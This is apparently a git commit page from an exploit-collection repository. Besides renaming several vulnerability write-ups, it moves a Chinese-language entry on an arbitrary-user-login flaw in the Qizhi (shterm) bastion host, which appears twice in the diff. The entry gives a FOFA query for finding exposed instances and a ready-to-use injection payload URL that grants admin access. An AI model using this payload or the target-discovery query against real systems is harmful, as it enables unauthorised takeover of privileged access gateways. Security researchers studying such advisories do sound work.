admin/0day
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

adjust name rules

Browse Source
This commit is contained in:
helloexp 2022-02-25 15:33:09 +08:00
parent 7ca52f7cb9
commit 1d1165414a
5 changed files with 36 additions and 39 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

0
06-Hadoop/Hadoop未授权访问/Hadoop未授权访问.md → 06-Hadoop/Hadoop未授权访问/README.md
View File

0
08-Mongo DB/Mongo DB未授权访问/Mongo DB未授权访问.md → 08-Mongo DB/Mongo DB未授权访问/README.md
View File

0
10-禅道/禅道 11.6 sql注入漏洞/禅道11.6 SQL注入.jpg → 10-禅道/禅道 11.6 sql注入漏洞/README.jpg
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 188 KiB

After

Width:  |  Height:  |  Size: 188 KiB

38
11-齐治堡垒机/齐治堡垒机 任意用户登录漏洞/README.md
View File

@ -1,3 +1,37 @@
# 齐治堡垒机 # 齐治堡垒机 任意用户登录漏洞
#### 齐治堡垒机 任意用户登录漏洞 ## 漏洞描述
齐治堡垒机 存在任意用户登录漏洞访问特定的Url即可获得后台权限
## 漏洞影响
> [!NOTE]
>
> 齐治堡垒机
## FOFA
> [!NOTE]
>
> app="齐治科技-堡垒机"
## 漏洞复现
漏洞POC为
```
http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
```
![](image/qz-1.png)
## Goby & POC
> [!NOTE]
>
> 已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中
>
> shterm(QiZhi) Fortress Arbitrary User Login
![](image/qz-2.png)

37
11-齐治堡垒机/齐治堡垒机 任意用户登录漏洞/齐治堡垒机 任意用户登录漏洞.md
View File

@ -1,37 +0,0 @@
# 齐治堡垒机 任意用户登录漏洞
## 漏洞描述
齐治堡垒机 存在任意用户登录漏洞访问特定的Url即可获得后台权限
## 漏洞影响
> [!NOTE]
>
> 齐治堡垒机
## FOFA
> [!NOTE]
>
> app="齐治科技-堡垒机"
## 漏洞复现
漏洞POC为
```
http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
```
![](image/qz-1.png)
## Goby & POC
> [!NOTE]
>
> 已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中
>
> shterm(QiZhi) Fortress Arbitrary User Login
![](image/qz-2.png)